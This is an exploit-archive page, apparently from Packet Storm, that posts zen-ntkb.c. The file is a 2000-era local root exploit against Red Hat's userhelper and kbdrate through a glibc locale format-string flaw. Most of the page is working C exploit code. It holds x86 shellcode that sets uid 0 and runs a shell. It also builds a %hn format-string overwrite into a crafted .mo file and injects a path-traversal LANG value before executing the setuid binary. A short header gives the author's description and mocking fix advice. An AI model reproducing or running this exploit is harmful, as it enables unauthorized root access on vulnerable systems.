exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

zen-ntkb.c

zen-ntkb.c
Posted Oct 19, 2000
Authored by Zen-Parse

/usr/sbin/userhelper / kbdrate local root exploit - works only at console. Works well for people you know.

tags | exploit, local, root
SHA-256 | f306e4b3197582d95675db9964fb45bc371416bf6ee9795a7888f293e8872bc3

zen-ntkb.c

Change Mirror Download
PROBLEM: local root thru setuid+glibc locale
FIX: don't let anyone else your computer.
WHAT??: advantage all other fixes to be suggested...
you get to use your computer more often than if you have to share it. ;}

FIX: no idea yet. mebe not allow .. in the locale for root or at all?

/* start of zen-nktb.c */
/***********************************************************
local root exploit - userhelper/kbdrate - console only
You can only use it on people you know.

--zen-parse--

** programs **

[root@continuity /root]# rpm -qf /usr/bin/kbdrate
util-linux-2.9w-24
[root@continuity /root]# rpm -qf /usr/sbin/userhelper
usermode-1.35-1
[root@continuity /root]# rpm -qf /lib/libc.so.6
glibc-2.1.3-21

** short description **

people can get root if they are logged in to your machine,
actually at the console.

** longer description **

This exploits the glibc locale hole (even in fixed version).
(If your name is in /var/lock/console/* then you can do it.
Mebe other ways as well.)
Gets past the fix because there is a call to setuid(0);
just before exec-ing the called program. Now uid=euid=0
so it even gives u core dumps(owned by root).

** reason **

The sanity checks don't set done on the nonsuid programs.
Maybe sanity check root and all suids?


***********************************************************/

/************************************************************************
another setlocale setuid proof of concept exploit
Sat Sep 30 02:47:38 NZST 2000 - ./zen-nktb.c

--zen-parse--
************************************************************************/
#include <stdio.h>
int getesp(){__asm__("movl %esp,%eax");}
char shellcode[] =
"\x90\x90\x31\xc0\x89\xc3\x89\xc1\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/xx";

void dopercentn(char *toaddr,unsigned int startloc,unsigned int sofar,int c)
// c =what i want in the 1st location
// startloc=pointer to successive pointers
{
char *bigfmt;
int f=0;
unsigned int buffer=0;
unsigned int d;
unsigned int p,q,r,s;
int n=1;
unsigned int thistime;
char fmt[1000];
f=startloc;
bigfmt=toaddr;
sofar=(0x100-sofar%0x100);
thistime=(c)%0x100+(sofar);
sprintf(fmt,"%%1$%dx%%%u$hn",thistime,f);
strcpy(bigfmt,fmt);
sofar=(sofar+(0x100-thistime));
thistime=(c>>8)%0x100+(sofar);
f++;
sprintf(fmt,"%%1$%dx%%%u$hn",thistime,f);
strcat(bigfmt,fmt);
sofar=sofar+(0x100-thistime);
thistime=(c>>16)%0x100+(sofar);
f++;
sprintf(fmt,"%%1$%dx%%%u$hn",thistime,f);
strcat(bigfmt,fmt);
sofar=sofar+(0x100-thistime);
thistime=(c>>24)%0x100+(sofar);
f++;
sprintf(fmt,"%%1$%dx%%%u$hn",thistime,f);
strcat(bigfmt,fmt);
}


main(int argc,char *argv[],char *env[])
{
FILE *fi,*fo;
char buf[100000],daenv[8000];
char *cwd,evil[300];
char *localedir;
unsigned long dasize=0,c,d=0,e=0,esp,i;
int o=0x0c12b;
int dest=0xbfffff16;
if (argc>1) d=atoi(argv[1]);
if (d==0) d =79;
if (argc>2) e=strtoul(argv[2],0,16);
if (e==0) e=0xbffffdb8;
fi=fopen("./util-linux.raw","r");
if (!fi)
{
perror("bugger: input didn't open:");
exit(-1);
}
if (mkdir("LC_MESSAGES",0755))
{
perror("Couldn't mkdir:");
if (chdir("LC_MESSAGES"))
{
perror("chdir failed:");
exit(-1);
}
chdir("..");
}
fo=fopen("./LC_MESSAGES/util-linux.mo","w");
if (!fo)
{
perror("bugger: output didn't open:");
exit(-1);
}
dasize=fread(buf,1,sizeof(buf),fi);
fclose(fi);
dopercentn(buf+o,d,0,dest);
strcpy(evil,"01234567890123456789012345678");
strcat(evil,shellcode);
esp=(unsigned int)(argv[0])%4;
esp=(6-esp)%4;
*(long*)(esp+evil)=e;
*(long*)(esp+evil+4)=e+1;
*(long*)(esp+evil+8)=e+2;
*(long*)(esp+evil+12)=e+3;
fwrite(buf,1,dasize,fo); // lazy, lazy, lazy.
fclose(fo);
cwd=(char *)getcwd(0,0);
if (!cwd)
{
perror("getcwd: Stop playing silly buggers. You want root, no? :");
exit(-1);
}
localedir=(char*)malloc(2000);
if (!localedir)
{
perror("malloc: fuck this for a game of soldiers:");
}
sprintf(localedir,"en_US/../../../../../..%s",cwd);
sprintf(daenv,"LANG=%s",localedir);
env[0]=0x0000000;
putenv("DISPLAY=:0.0");
putenv(daenv);
putenv("TERM=vt100");
putenv("SHELL=/bin/sh");
putenv("USER=root");
putenv("LOGNAME=root");
setenv("HOME",evil,1);
printf("Using dir of: %s\n",localedir);
execl("/usr/sbin/userhelper","/usr/sbin/userhelper","-t","-w","/sbin/kbdrate",0);
}

/* end of zen-nktb.c */



Send someone a cool Dynamitemail flashcard greeting!! And get rewarded.
GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close